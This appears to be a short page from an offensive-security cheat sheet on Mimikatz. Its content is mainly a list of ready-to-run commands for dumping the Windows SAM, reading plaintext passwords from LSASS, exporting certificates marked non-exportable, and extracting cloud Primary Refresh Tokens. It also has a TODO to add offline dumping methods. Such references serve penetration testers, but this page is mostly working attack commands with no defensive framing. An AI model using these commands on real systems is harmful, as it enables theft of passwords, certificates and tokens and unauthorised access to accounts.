Mimikatz

Used to interact with the LSASS.exe process to extract secrets from a Windows machine. Requires SYSTEM level access.

# Dump the SAM
lsadump::sam

# Read plaintext passwords
sekurlsa::logonpasswords

# Dump certificates store, even those marked as non-exportable
crypto::certificates /systemstore:local_machine

# Gather the Primary Refresh Token (cloud account)
sekurlsa::cloudap
dpapi::cloudapkd

# TODO
Add offline SAM dumps and LSASS extraction
PreviousBrute ForcingNextPassword Cracking

Last updated